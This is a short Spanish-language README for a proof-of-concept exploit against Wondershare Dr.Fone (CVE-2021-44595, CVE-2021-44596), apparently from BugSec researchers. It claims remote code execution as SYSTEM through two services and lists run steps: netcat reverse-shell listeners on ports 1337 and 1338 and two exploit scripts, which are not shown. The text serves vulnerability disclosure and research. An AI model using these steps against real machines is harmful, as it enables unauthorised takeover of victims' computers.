
Exploit de prueba de concepto para CVE-2021-44595 y CVE-2021-44596 en Wondershare Dr.Fone, que permite la ejecución remota de código como SYSTEM mediante servicios vulnerables.
Netanel Cohen y Tomer Peled, investigadores de seguridad de BugSec.
Ejemplo de POC para explotar Wondershare Dr.Fone .
Dr.Fone es un kit de herramientas para teléfonos desarrollado por Wondershare, y es vulnerable a RCE.
Solo con acceso a la red logramos ejecutar código remoto como usuario SYSTEM.
Servicios vulnerables:
InstallAssistService.exe
ElevationService.exe
Probado en versiones: 12.0.7, 11.4
Cambie la IP y el puerto y ejecute.
stty raw -echo; (stty size; cat) | nc -lvnp 1338
./ElevationServiceRCE.py
nc -lvnp 1337
./InstallAssistServiceRCE.py